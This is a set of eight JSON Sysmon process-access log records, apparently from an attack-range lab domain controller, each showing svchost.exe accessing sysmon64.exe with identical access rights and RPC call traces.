{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3169,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.563\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.563","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3170,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.563\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.563","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3171,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.563\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.563","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3172,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.563\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.563","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3173,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.563\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.563","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3174,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.563\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.563","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3175,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.563\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.563","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3176,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.563\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.563","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
